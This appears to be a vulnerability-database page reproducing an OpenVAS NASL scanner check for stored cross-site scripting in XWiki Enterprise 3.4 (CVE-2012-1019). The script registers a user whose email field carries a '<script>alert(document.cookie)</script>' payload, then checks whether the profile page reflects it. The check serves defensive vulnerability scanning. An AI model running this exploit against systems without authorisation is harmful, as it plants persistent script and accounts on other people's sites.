Lucene search

K
openvasCopyright (c) 2012 Greenbone Networks GmbHOPENVAS:802397
HistoryMar 09, 2012 - 12:00 a.m.

XWiki Enterprise Multiple Cross-Site Scripting Vulnerabilities

2012-03-0900:00:00
Copyright (c) 2012 Greenbone Networks GmbH
plugins.openvas.org
20

EPSS

0.002

Percentile

60.2%

The host is running XWiki Enterprise and is prone to cross site
scripting vulnerabilities.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_xwiki_enterprise_mult_xss_vuln.nasl 7573 2017-10-26 09:18:50Z cfischer $
#
# XWiki Enterprise Multiple Cross-Site Scripting Vulnerabilities
#
# Authors:
# Rachana Shetty <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow remote attackers to insert
arbitrary HTML and script code, which will be executed in a user's browser
session in the context of an affected site.

Impact Level: Application";

tag_affected = "XWiki version 3.4 and prior";

tag_insight = "The flaws are due to an improper validation of user-supplied
input via 
- the 'XWiki.XWikiComments_comment' parameter to
  'xwiki/bin/commentadd/Main/WebHome' when posting a comment.
- the 'XWiki.XWikiUsers_0_company' parameter when editing a user's profile
- the 'projectVersion' parameter to
  'xwiki/bin/view/DownloadCode/DownloadFeedback' when downloading a file.
  Which allows attackers to execute arbitrary HTML and script code in a
  user's browser session in the context of an affected site.";

tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";

tag_summary = "The host is running XWiki Enterprise and is prone to cross site
scripting vulnerabilities.";

if(description)
{
  script_id(802397);
  script_version("$Revision: 7573 $");
  script_bugtraq_id(51867);
  script_cve_id("CVE-2012-1019");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"$Date: 2017-10-26 11:18:50 +0200 (Thu, 26 Oct 2017) $");
  script_tag(name:"creation_date", value:"2012-03-09 11:12:00 +0530 (Fri, 09 Mar 2012)");
  script_name("XWiki Enterprise Multiple Cross-Site Scripting Vulnerabilities");
  script_xref(name : "URL" , value : "http://secunia.com/advisories/47885");
  script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/73010");
  script_xref(name : "URL" , value : "http://st2tea.blogspot.com/2012/02/xwiki-cross-site-scripting.html");
  script_xref(name : "URL" , value : "http://packetstormsecurity.org/files/109447/XWiki-Enterprise-3.4-Cross-Site-Scripting.html");

  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_dependencies("gb_xwiki_enterprise_detect.nasl");
  script_require_ports("Services/www", 8080);
  script_mandatory_keys("xwiki/installed");
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}

include("http_func.inc");
include("version_func.inc");
include("http_keepalive.inc");

## Variables Initialization
xwikiPort = 0;
host = "";
url  = "";
req  = "";
res  = "";
sndReq = "";
rcvRes = "";
tokenValue = "";

## Stored XSS (Not a safe check)
if(safe_checks()){
  exit(0);
}

xwikiPort = get_http_port(default:8080);
if(!dir = get_dir_from_kb(port:xwikiPort, app:"XWiki")){
  exit(0);
}

host = http_host_name( port:xwikiPort );

## Construct the Attack Request
url = dir + "/bin/register/XWiki/Register";

## Send Register request and Receive the response
sndReq = http_get(item:url, port:xwikiPort);
rcvRes = http_keepalive_send_recv(port:xwikiPort, data:sndReq);

##Get the  form_token value from Response
tokenValue = eregmatch(pattern:'name="form_token" value="([a-zA-Z0-9]+)"',
                       string:rcvRes);

if(!tokenValue || !tokenValue[1]){
  exit(0);
}

## Construct the POST data
postdata = "form_token="+ tokenValue[1] +"&register_first_name=ppp&"        +
           "register_last_name=ppp&xwikiname=PppPpp&register_password=secpod&" +
           "register2_password=secpod&register_email=<script>alert(document."  +
           "cookie)</script>@gmail.com&template=XWiki.XWikiUserTemplate&"   +
           "xredirect=";

## Construct the POST request
req = string("POST ", url, " HTTP/1.1\r\n",
             "Host: ", host, "\r\n",
             "User-Agent: ", OPENVAS_HTTP_USER_AGENT, "\r\n",
             "Referer: http://", host, url, "\r\n",
             "Content-Type: application/x-www-form-urlencoded\r\n",
             "Content-Length: ", strlen(postdata), "\r\n",
             "\r\n", postdata);

## Send XSS attack
res = http_keepalive_send_recv(port:xwikiPort, data:req);

if (res)
{
  ## Confirm the Attack by opening the registered profile
  url = "/xwiki/bin/view/XWiki/PppPpp";

  if(http_vuln_check(port:xwikiPort, url:url, check_header: TRUE,
     pattern:"<script>alert\(document.cookie\)</script>"))
  {
    security_message(xwikiPort);
    exit(0);
  }
}

EPSS

0.002

Percentile

60.2%

Related for OPENVAS:802397